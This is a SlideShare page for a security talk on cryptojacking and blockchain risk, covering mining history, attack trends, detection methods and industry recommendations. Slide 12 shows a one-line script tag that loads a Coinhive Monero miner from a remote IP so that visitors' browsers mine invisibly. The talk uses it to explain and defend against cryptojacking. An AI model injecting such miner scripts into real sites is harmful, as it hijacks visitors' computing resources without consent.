SlideShare a Scribd company logo

CryptoJacking and Security: Evolution of a Hack

Download as PPTX, PDF
B
Bryan Becker

The document discusses the evolution and current state of cryptojacking and blockchain technology, emphasizing the significant rise in cryptojacking attacks and the various methods employed by attackers. It explores blockchain fundamentals, the implications of tokenization, and the future trends within the space, stressing the need for security measures. Additionally, it outlines recommendations for the industry regarding governance, education, and development practices in relation to blockchain technologies.

Technology
Related topics:
Smart Contracts Guide
1 of 40
Downloaded 12 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
Evolution of a Hack CryptoJacking, CryptoCurrencies, and Blockchains
Preliminaries ▪ Bryan Becker, CISSP, CCSP ▪ More Futurist, less Crypto-Maximalist ▪ Terrified of CRISPR ▪ All opinions my own and not that of my employer. ▪ DISCLAIMER: Bad Words! ▪ I Promise. ▪ Slap me if I talk about bitcoin price. ▪ None of this should be considered financial advice.
Agenda ▪ CryptoJacking and newer, rebranded attacks against companies with efforts to exploit resources using blockchain public chains and technologies. ▪ Are we ready for an “Internet of Literal Things Encapsulated in Tokens” revolution from a security perspective?
Top 5 Uses of Public Blockchain Tokens! ▪ GIVEAWAY ▪ #5 – Useless Ethereum Token (UET) ▪ FAQ: “Wait … is this a joke? Is it a scam? Neither! This is real — and it’s 100% transparent. You’re literally giving your money to someone on the internet and getting completely useless tokens in return.” ▪ #4 -- SpankChain ▪ #3 -- PotCoin ▪ #2 – C**kBlockChain ▪ #1 -- F*ckToken -- $0.00005.
What is Blockchain anyways?
Blockchain Fundamentals ▪ Distributed Ledger ▪ Consensus by Code ▪ Digital Scarcity ▪ Programmability (Smart Contracts)
Blockchain Fundamentals - “What is a Wallet” ▪ AN INTERFACE WHICH INTERACTS WITH A BLOCKCHAIN. ▪ It doesn’t store money, it stores and interacts private keys . ▪ It’s not a “place”, it’s an interface to pub/private key pairs to handle crypto assets. ▪ It can be… ▪ As simple as a piece of paper ▪ A fat client ▪ Mobile App ▪ Browser Extension ▪ Hardware token
How Proof of Work Consensus Works ▪ Transactions get broadcasted to a node ▪ Node adds transaction to a block (small file of transactions) ▪ All other validators do math during the blocktime. ▪ One validator wins the block discovery, adds the block to the chain, and “wins” the lottery for freshly minted tokens for security incentive for ”Proof of Work”
How Monero Works
CryptoJacking History ▪ Bitcoin browser-based mining: A thing since 2011. ▪ No ASICS ▪ Bitcoin was cheap and mining was profitable (don’t slap me!) ▪ Bitcoinplus.com ▪ Mostly disappeared with the onset of new technology. ▪ More things change, the more they stay the same…
Current Risk: CryptoJacking ▪ CryptoJacking a.k.a. Harvest of distributed computing resources (CPU, Memory, Disk, Bandwidth) for financial gain of attacker. ▪ With the coin mining gold rush, cryptojacking attacks skyrocketed 8,500 percent ▪ DRUPALGEDDON 2: 400 Drupal Websites hit using latest vuln. ▪ Shopify Plugin creates 5 iFrames which mines Monero. ▪ Showtime, UFC.TV. ▪ Weatherfor.us plugin for websites injects mining scripts. ▪ Fileless malware Ghostminer kills other cryptojacking competitors and mines in memory and is nearly undetectable. ▪ CoinHive == CryptoJacking as a Service (CJaaS?)
It’s Literally This Easy (Invisible Browser Mining) <script type='text/javascript' src='http://174.138.43.214/wp- content/plugins/simple-monero-miner-coin-hive/js/smmch- mine.js?v=1.4&#038;ver=4.9.5'></script> Open source rig: https://github.com/xmrig/xmrig
Detection and Prevention ▪ Mostly detected at the network level (now) ▪ Resource Utilization and Monitoring ▪ Browser Level Detections via Software or Extensions (NoCoin, MinerBlock) ▪ Injection detection. ▪ No-Script ▪ IDS/IPS rules for DNS calls (DNS sinkholes) ▪ Anomaly Detection for Network Baseline monitoring ▪ BUILT-IN BROWSER restrictions ▪ NUCLEAR OPTION: Disable JavaScript
CryptoJacking and Security: Evolution of a Hack
DEMO!!!! ▪ DEMO WORLD, PARTY TIME, EXCELLENT!
CryptoJacking Future/Potential ▪ Why the resurgence? ▪ Privacy Based Coins ▪ Ease of Deployment ▪ Hard to find if throttled ▪ Mobile explosion ▪ Fundamental Profitability Problem ▪ CoinHive maxed out at 13.5 MH/s == ~5% of the Monero Hash Pool. Month by Month percentage change in Browser-based Mining. (Symantec)
CryptoJacking and Security: Evolution of a Hack
Future Forms of CryptoJacking ▪ The Future of Monetization ▪ Evolution of current attacks ▪ WannaMine worm (ETERNALBLUE) ▪ GhostMiner ▪ GPU, File Storage ▪ IoT-focused CryptoJacking ▪ RadiFlow ICS Mining ▪ NEW TARGETS ▪ Fogs ▪ Kubernetes Clusters
CryptoJacking for Charity! ▪ UNICEF ▪ www.thehopepage.org
CryptoJacking and Security: Evolution of a Hack
https://www.nvidia.com/object/what-is-gpu-computing.html
Part 2 Evolution of a Hack  Tokenized “Asset-ful” Data Structures
Security with Tokenized “Asset-ful” Data Structures ▪ “I recall hearing in recent years, if you were a “startup” until you reached a certain revenue threshold, security should not be a major concern or spend area.” – Director-level Consultant in Boulder. ▪ You cannot mess up something decentralized in a fundamental way; anything less than absolute correctness is absolute failure. — Charles Noyes
The Internet of Money ▪ Web 3.0! ▪ Tokenize ALL THE THINGS! ▪ Make the world more liquid! ▪ Assets on the blockchain! ▪ Eliminate the middle man with smart contracts! ▪ EVERYTHING on the Blockchain! ▪ Health Records, Identity, Supply Chains, Security Tokens, Real Assets
What a time to be alive! ▪ “We rarely see people talking about what will form the main usage of Blockchain: Robots and Machines. This isn't going to be about whether grandpa or grandma, mommy or daddy are gonna want to use Blockchain or not. We are talking about the billion of interconnected devices which, for the first time in technological history, will be able to transact value from device to device, in a safe, fast and trustable manner.” ▪ In the near-future, the Internet of Things will move money and assets autonomously or as directed by a DAO or AI.
CryptoJacking and Security: Evolution of a Hack
Adoption: Blockchain news from the past 4 weeks days. ▪ “In the future, owning an asset and not having it tokenized on the blockchain will be the equivalent of owning a company and not being on the Internet today.” – Crypto Hedge Funder ▪ Bloomberg and Galaxy Digital just announced they're launching a cryptocurrency index to track 10 of the most liquid crypto assets. ▪ China's Ministry of Public Security is planning to use blockchain technology to drastically improve their handling of evidence from police investigations. ▪ Facebook is launching an internal team to exclusively focus on blockchain tech. The team is led by David Marcus, former PayPal President & current Coinbase board member
Adoption: Blockchain news from the past 4 weeks days. ▪ Oracle, the fourth largest software company in the world according to Forbes, is launching their blockchain products this month. ▪ Consensys and Saudi Arabia‘s Ministry of Communications and Information Technology recently held a blockchain bootcamp to teach the skills necessary for this new world. ▪ JPMorgan filed a patent to use blockchain for Bank-to-Bank transactions. ▪ Goldman Sachs is opening a Bitcoin trading operation. ▪ The South Korean Central Bank is planning to use cryptocurrencies to achieve a truly cashless society by 2020
CryptoJacking and Security: Evolution of a Hack
CryptoJacking and Security: Evolution of a Hack
Wall Street Journal: Paul Vizla
Wait, WHAT?!??! WHAT ARE WE THINKING ▪ Coinbase Bug Allowed Users to Give Themselves Unlimited Ether - Gizmodo ▪ Founders of a cryptocurrency backed by Floyd Mayweather charged with fraud by SEC - CNBC
Wait, WHAT?!??! WHAT ARE WE THINKING • Malware which monitors clipboards. • Smart Contract coding vulnerabilities (PARITY)
Blockchains and Government ▪ Governments which recognize Smart Contracts as law ▪ Tennessee ▪ Arizona ▪ Florida ▪ More to come
Some Inconvenient Truths ▪ Most dApps don’t even need a blockchain. ▪ Users can’t even handle a password, now you want them a wallet and a private key? ▪ CONFIDENTIALITY BROKEN. ▪ Smart Contracts are still written by humans. ▪ Criminals flock to where the low hanging fruit is.
Some Inconvenient Truths ▪ Validator nodes are still servers run by someone. ▪ Internal blockchains validator nodes still are servers handled by humans. ▪ INTEGRITY BROKEN. ▪ PARADIGM CHALLENGE ▪ “Move fast and break” things for systems with tokenized assets is not an effective development strategy. ▪ Check ourselves before we wreck ourselves. ▪ Governance, governance, governance.
The Power of Programmers: A New Ethics Dilemma ▪ Security Token explosion coming. ▪ Assets, such as houses, supply chains, physical money, gold bullion. ▪ Programmers writing protocols which: ▪ Store assets. ▪ Move assets ▪ Use smart contracts to hold assets in “virtual escrow” ▪ These protocols will run be the foundation of mutual funds, asset portfolios, money transfers, holding institutions, and the like.
Recommendations for our Industry ▪ NIST guidance paper(s) and Blockchain Security Framework. ▪ Overall guidelines on the tech and deployment. ▪ Internal Governance. ▪ GLB-like law for FinTech with Blockchains. ▪ Privacy Law Update. Blockchain Won’t Make it Better. ▪ Makes Law Enforcement that much harder. ▪ Massive Education Investments needed.
Recommendations for our Industry ▪ Reuse the Good Code! ▪ Opensource Shared User Models and pre-Deployed Contract Modules. ▪ KNOW YOUR RISK: Flipping the Development Paradigm on it’s head. ▪ Move slow so no one loses their house. Security First! ▪ Develop more smart contract auditors. ▪ Inning 2. Know Risks, Continue to Improve.
<FIN> ▪ Questions and Answer. ▪ QR me  ▪ Bryan Becker ▪ @_beckerb

More Related Content

PPTX
What is Cryptojacking and How Can I Protect Myself?
Global Knowledge Training
 
PPTX
PacNOG 23: Introduction to Crypto Jacking
APNIC
 
PPTX
Ethical hacking Presentation
AmbikaMalgatti
 
PPTX
ETHICAL HACKING PRESENTATION
Yash Shukla
 
PPT
presentation on cyber crime and security
Alisha Korpal
 
PPTX
Data Privacy and Protection Presentation
mlw32785
 
PPTX
Vulnerability and Assessment Penetration Testing
Yvonne Marambanyika
 
PPT
Web development | Derin Dolen
Derin Dolen
 
What is Cryptojacking and How Can I Protect Myself?
Global Knowledge Training
 
PacNOG 23: Introduction to Crypto Jacking
APNIC
 
Ethical hacking Presentation
AmbikaMalgatti
 
ETHICAL HACKING PRESENTATION
Yash Shukla
 
presentation on cyber crime and security
Alisha Korpal
 
Data Privacy and Protection Presentation
mlw32785
 
Vulnerability and Assessment Penetration Testing
Yvonne Marambanyika
 
Web development | Derin Dolen
Derin Dolen
 

What's hot (20)

PPTX
Cyber crime and security
Sharath Raj
 
PDF
Web Development Presentation
TurnToTech
 
PDF
Cyber Security
Ramiro Cid
 
PDF
Principles Of Chaos Engineering - Chaos Engineering Hamburg
Nils Meder
 
PDF
What is Web Testing?
QA InfoTech
 
PPTX
Introduction to Automation Testing
Archana Krushnan
 
PPT
DDoS Attack PPT by Nitin Bisht
Nitin Bisht
 
PPTX
Dark Web
KunalDas889957
 
PPT
All about Hacking
Madhusudhan G
 
PPTX
Presentation on ethical hacking
Sunny Sundeep
 
PDF
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
PPTX
Detection of phishing websites
m srikanth
 
PPTX
Networking infrastructure
Kerry Cole
 
PPT
World wide web
Mayjyn Monares
 
PPTX
Html, CSS & Web Designing
Leslie Steele
 
PPTX
Software testing
Kunal Prajapati
 
PPTX
Introduction to ASP.NET
Rajkumarsoy
 
PPT
Automation testing strategy, approach & planning
SivaprasanthRentala1975
 
PDF
Javascript
Momentum Design Lab
 
PDF
Web Design & Development - Session 2
Shahrzad Peyman
 
Cyber crime and security
Sharath Raj
 
Web Development Presentation
TurnToTech
 
Cyber Security
Ramiro Cid
 
Principles Of Chaos Engineering - Chaos Engineering Hamburg
Nils Meder
 
What is Web Testing?
QA InfoTech
 
Introduction to Automation Testing
Archana Krushnan
 
DDoS Attack PPT by Nitin Bisht
Nitin Bisht
 
Dark Web
KunalDas889957
 
All about Hacking
Madhusudhan G
 
Presentation on ethical hacking
Sunny Sundeep
 
Web App Security Presentation by Ryan Holland - 05-31-2017
TriNimbus
 
Detection of phishing websites
m srikanth
 
Networking infrastructure
Kerry Cole
 
World wide web
Mayjyn Monares
 
Html, CSS & Web Designing
Leslie Steele
 
Software testing
Kunal Prajapati
 
Introduction to ASP.NET
Rajkumarsoy
 
Automation testing strategy, approach & planning
SivaprasanthRentala1975
 
Javascript
Momentum Design Lab
 
Web Design & Development - Session 2
Shahrzad Peyman
 

Similar to CryptoJacking and Security: Evolution of a Hack (20)

PDF
Quick Understanding of Bitcoin/Cryptocurrency.
Satish Mudaliar
 
PDF
Quick Understanding of Bitcoin/Cryptocurrency.
Satish Mudaliar
 
PDF
Blockchain cryptocurrencies and banking
Clémentine Grossetête
 
PPTX
Hacking blockchain
Jose L. Quiñones-Borrero
 
PDF
A Primer on Blockchain and its Potential, with a Focus on the GCC
Zeyad T. Al Mudhaf
 
PPTX
Blockchains: Bitcoin was always so much more
Robin Teigland
 
ODP
CBGTBT - Part 1 - Workshop introduction & primer
Blockstrap.com
 
PPTX
blockchain-161025100639.pptx
Praveenkumar155694
 
PDF
WHAT IS CRYPTOCURRENCY EXPECTED APPLICATIONS.
Qutomatic
 
PPT
An Investigator’s Guide to Blockchain, Bitcoin and Wallet Transactions
Case IQ
 
PPTX
Blockchain 101 - public, tokenized blockchains
Brett Colbert
 
PDF
Blockchain and Banking
HyperTrends Global Inc.
 
PDF
State of Crypto in 2019
Kleiner Perkins
 
PPTX
Dubai Blockchain_channel_22072018
Pekka Kelkka
 
PDF
Indjic fintech module 6
Drago Indjic
 
PDF
UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...
Ogilvy Consulting
 
PDF
Cryptocurrencies and Blockchain technology
Sabrina Kirrane
 
PDF
The Revolution of Crypto Funding - Building towards a Scamless Future
Ruben Merre
 
PDF
Iceic2019 final presented
Heung-No Lee
 
PDF
Smart Contracts - The Blockchain Beyond Bitcoin
Jim McKeeth
 
Quick Understanding of Bitcoin/Cryptocurrency.
Satish Mudaliar
 
Quick Understanding of Bitcoin/Cryptocurrency.
Satish Mudaliar
 
Blockchain cryptocurrencies and banking
Clémentine Grossetête
 
Hacking blockchain
Jose L. Quiñones-Borrero
 
A Primer on Blockchain and its Potential, with a Focus on the GCC
Zeyad T. Al Mudhaf
 
Blockchains: Bitcoin was always so much more
Robin Teigland
 
CBGTBT - Part 1 - Workshop introduction & primer
Blockstrap.com
 
blockchain-161025100639.pptx
Praveenkumar155694
 
WHAT IS CRYPTOCURRENCY EXPECTED APPLICATIONS.
Qutomatic
 
An Investigator’s Guide to Blockchain, Bitcoin and Wallet Transactions
Case IQ
 
Blockchain 101 - public, tokenized blockchains
Brett Colbert
 
Blockchain and Banking
HyperTrends Global Inc.
 
State of Crypto in 2019
Kleiner Perkins
 
Dubai Blockchain_channel_22072018
Pekka Kelkka
 
Indjic fintech module 6
Drago Indjic
 
UNBLOCKED: The Power of Blockchain Technology to Establish Trust, Build Brand...
Ogilvy Consulting
 
Cryptocurrencies and Blockchain technology
Sabrina Kirrane
 
The Revolution of Crypto Funding - Building towards a Scamless Future
Ruben Merre
 
Iceic2019 final presented
Heung-No Lee
 
Smart Contracts - The Blockchain Beyond Bitcoin
Jim McKeeth
 

Recently uploaded (20)

PDF
Approach and Philosophy of On baking technology
30anthuong17
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PPTX
Spectroscopy.pptx food analysis technology
nawahassan45
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PPTX
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
PPTX
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 
Approach and Philosophy of On baking technology
30anthuong17
 
Teaching material agriculture food technology
LiaRayya
 
A comparative analysis of optical character recognition models for extracting...
IAESIJAI
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Encapsulation theory and applications.pdf
gurumoop
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Spectroscopy.pptx food analysis technology
nawahassan45
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Agricultural_Statistics_at_a_Glance_2022_0.pdf
SandeepSingh286037
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
A Presentation on Artificial Intelligence
memembruh336
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Tartificialntelligence_presentation.pptx
ry7r52mzb4
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
gpt5_lecture_notes_comprehensive_20250812015547.pdf
Chinchu40
 
OMC Textile Division Presentation 2021.pptx
JahangirAlam816069
 

CryptoJacking and Security: Evolution of a Hack

  • 1. Evolution of a Hack CryptoJacking, CryptoCurrencies, and Blockchains
  • 2. Preliminaries ▪ Bryan Becker, CISSP, CCSP ▪ More Futurist, less Crypto-Maximalist ▪ Terrified of CRISPR ▪ All opinions my own and not that of my employer. ▪ DISCLAIMER: Bad Words! ▪ I Promise. ▪ Slap me if I talk about bitcoin price. ▪ None of this should be considered financial advice.
  • 3. Agenda ▪ CryptoJacking and newer, rebranded attacks against companies with efforts to exploit resources using blockchain public chains and technologies. ▪ Are we ready for an “Internet of Literal Things Encapsulated in Tokens” revolution from a security perspective?
  • 4. Top 5 Uses of Public Blockchain Tokens! ▪ GIVEAWAY ▪ #5 – Useless Ethereum Token (UET) ▪ FAQ: “Wait … is this a joke? Is it a scam? Neither! This is real — and it’s 100% transparent. You’re literally giving your money to someone on the internet and getting completely useless tokens in return.” ▪ #4 -- SpankChain ▪ #3 -- PotCoin ▪ #2 – C**kBlockChain ▪ #1 -- F*ckToken -- $0.00005.
  • 6. Blockchain Fundamentals ▪ Distributed Ledger ▪ Consensus by Code ▪ Digital Scarcity ▪ Programmability (Smart Contracts)
  • 7. Blockchain Fundamentals - “What is a Wallet” ▪ AN INTERFACE WHICH INTERACTS WITH A BLOCKCHAIN. ▪ It doesn’t store money, it stores and interacts private keys . ▪ It’s not a “place”, it’s an interface to pub/private key pairs to handle crypto assets. ▪ It can be… ▪ As simple as a piece of paper ▪ A fat client ▪ Mobile App ▪ Browser Extension ▪ Hardware token
  • 8. How Proof of Work Consensus Works ▪ Transactions get broadcasted to a node ▪ Node adds transaction to a block (small file of transactions) ▪ All other validators do math during the blocktime. ▪ One validator wins the block discovery, adds the block to the chain, and “wins” the lottery for freshly minted tokens for security incentive for ”Proof of Work”
  • 10. CryptoJacking History ▪ Bitcoin browser-based mining: A thing since 2011. ▪ No ASICS ▪ Bitcoin was cheap and mining was profitable (don’t slap me!) ▪ Bitcoinplus.com ▪ Mostly disappeared with the onset of new technology. ▪ More things change, the more they stay the same…
  • 11. Current Risk: CryptoJacking ▪ CryptoJacking a.k.a. Harvest of distributed computing resources (CPU, Memory, Disk, Bandwidth) for financial gain of attacker. ▪ With the coin mining gold rush, cryptojacking attacks skyrocketed 8,500 percent ▪ DRUPALGEDDON 2: 400 Drupal Websites hit using latest vuln. ▪ Shopify Plugin creates 5 iFrames which mines Monero. ▪ Showtime, UFC.TV. ▪ Weatherfor.us plugin for websites injects mining scripts. ▪ Fileless malware Ghostminer kills other cryptojacking competitors and mines in memory and is nearly undetectable. ▪ CoinHive == CryptoJacking as a Service (CJaaS?)
  • 12. It’s Literally This Easy (Invisible Browser Mining) <script type='text/javascript' src='http://174.138.43.214/wp- content/plugins/simple-monero-miner-coin-hive/js/smmch- mine.js?v=1.4&#038;ver=4.9.5'></script> Open source rig: https://github.com/xmrig/xmrig
  • 13. Detection and Prevention ▪ Mostly detected at the network level (now) ▪ Resource Utilization and Monitoring ▪ Browser Level Detections via Software or Extensions (NoCoin, MinerBlock) ▪ Injection detection. ▪ No-Script ▪ IDS/IPS rules for DNS calls (DNS sinkholes) ▪ Anomaly Detection for Network Baseline monitoring ▪ BUILT-IN BROWSER restrictions ▪ NUCLEAR OPTION: Disable JavaScript
  • 15. DEMO!!!! ▪ DEMO WORLD, PARTY TIME, EXCELLENT!
  • 16. CryptoJacking Future/Potential ▪ Why the resurgence? ▪ Privacy Based Coins ▪ Ease of Deployment ▪ Hard to find if throttled ▪ Mobile explosion ▪ Fundamental Profitability Problem ▪ CoinHive maxed out at 13.5 MH/s == ~5% of the Monero Hash Pool. Month by Month percentage change in Browser-based Mining. (Symantec)
  • 18. Future Forms of CryptoJacking ▪ The Future of Monetization ▪ Evolution of current attacks ▪ WannaMine worm (ETERNALBLUE) ▪ GhostMiner ▪ GPU, File Storage ▪ IoT-focused CryptoJacking ▪ RadiFlow ICS Mining ▪ NEW TARGETS ▪ Fogs ▪ Kubernetes Clusters
  • 19. CryptoJacking for Charity! ▪ UNICEF ▪ www.thehopepage.org
  • 22. Part 2 Evolution of a Hack  Tokenized “Asset-ful” Data Structures
  • 23. Security with Tokenized “Asset-ful” Data Structures ▪ “I recall hearing in recent years, if you were a “startup” until you reached a certain revenue threshold, security should not be a major concern or spend area.” – Director-level Consultant in Boulder. ▪ You cannot mess up something decentralized in a fundamental way; anything less than absolute correctness is absolute failure. — Charles Noyes
  • 24. The Internet of Money ▪ Web 3.0! ▪ Tokenize ALL THE THINGS! ▪ Make the world more liquid! ▪ Assets on the blockchain! ▪ Eliminate the middle man with smart contracts! ▪ EVERYTHING on the Blockchain! ▪ Health Records, Identity, Supply Chains, Security Tokens, Real Assets
  • 25. What a time to be alive! ▪ “We rarely see people talking about what will form the main usage of Blockchain: Robots and Machines. This isn't going to be about whether grandpa or grandma, mommy or daddy are gonna want to use Blockchain or not. We are talking about the billion of interconnected devices which, for the first time in technological history, will be able to transact value from device to device, in a safe, fast and trustable manner.” ▪ In the near-future, the Internet of Things will move money and assets autonomously or as directed by a DAO or AI.
  • 27. Adoption: Blockchain news from the past 4 weeks days. ▪ “In the future, owning an asset and not having it tokenized on the blockchain will be the equivalent of owning a company and not being on the Internet today.” – Crypto Hedge Funder ▪ Bloomberg and Galaxy Digital just announced they're launching a cryptocurrency index to track 10 of the most liquid crypto assets. ▪ China's Ministry of Public Security is planning to use blockchain technology to drastically improve their handling of evidence from police investigations. ▪ Facebook is launching an internal team to exclusively focus on blockchain tech. The team is led by David Marcus, former PayPal President & current Coinbase board member
  • 28. Adoption: Blockchain news from the past 4 weeks days. ▪ Oracle, the fourth largest software company in the world according to Forbes, is launching their blockchain products this month. ▪ Consensys and Saudi Arabia‘s Ministry of Communications and Information Technology recently held a blockchain bootcamp to teach the skills necessary for this new world. ▪ JPMorgan filed a patent to use blockchain for Bank-to-Bank transactions. ▪ Goldman Sachs is opening a Bitcoin trading operation. ▪ The South Korean Central Bank is planning to use cryptocurrencies to achieve a truly cashless society by 2020
  • 31. Wall Street Journal: Paul Vizla
  • 32. Wait, WHAT?!??! WHAT ARE WE THINKING ▪ Coinbase Bug Allowed Users to Give Themselves Unlimited Ether - Gizmodo ▪ Founders of a cryptocurrency backed by Floyd Mayweather charged with fraud by SEC - CNBC
  • 33. Wait, WHAT?!??! WHAT ARE WE THINKING • Malware which monitors clipboards. • Smart Contract coding vulnerabilities (PARITY)
  • 34. Blockchains and Government ▪ Governments which recognize Smart Contracts as law ▪ Tennessee ▪ Arizona ▪ Florida ▪ More to come
  • 35. Some Inconvenient Truths ▪ Most dApps don’t even need a blockchain. ▪ Users can’t even handle a password, now you want them a wallet and a private key? ▪ CONFIDENTIALITY BROKEN. ▪ Smart Contracts are still written by humans. ▪ Criminals flock to where the low hanging fruit is.
  • 36. Some Inconvenient Truths ▪ Validator nodes are still servers run by someone. ▪ Internal blockchains validator nodes still are servers handled by humans. ▪ INTEGRITY BROKEN. ▪ PARADIGM CHALLENGE ▪ “Move fast and break” things for systems with tokenized assets is not an effective development strategy. ▪ Check ourselves before we wreck ourselves. ▪ Governance, governance, governance.
  • 37. The Power of Programmers: A New Ethics Dilemma ▪ Security Token explosion coming. ▪ Assets, such as houses, supply chains, physical money, gold bullion. ▪ Programmers writing protocols which: ▪ Store assets. ▪ Move assets ▪ Use smart contracts to hold assets in “virtual escrow” ▪ These protocols will run be the foundation of mutual funds, asset portfolios, money transfers, holding institutions, and the like.
  • 38. Recommendations for our Industry ▪ NIST guidance paper(s) and Blockchain Security Framework. ▪ Overall guidelines on the tech and deployment. ▪ Internal Governance. ▪ GLB-like law for FinTech with Blockchains. ▪ Privacy Law Update. Blockchain Won’t Make it Better. ▪ Makes Law Enforcement that much harder. ▪ Massive Education Investments needed.
  • 39. Recommendations for our Industry ▪ Reuse the Good Code! ▪ Opensource Shared User Models and pre-Deployed Contract Modules. ▪ KNOW YOUR RISK: Flipping the Development Paradigm on it’s head. ▪ Move slow so no one loses their house. Security First! ▪ Develop more smart contract auditors. ▪ Inning 2. Know Risks, Continue to Improve.
  • 40. <FIN> ▪ Questions and Answer. ▪ QR me  ▪ Bryan Becker ▪ @_beckerb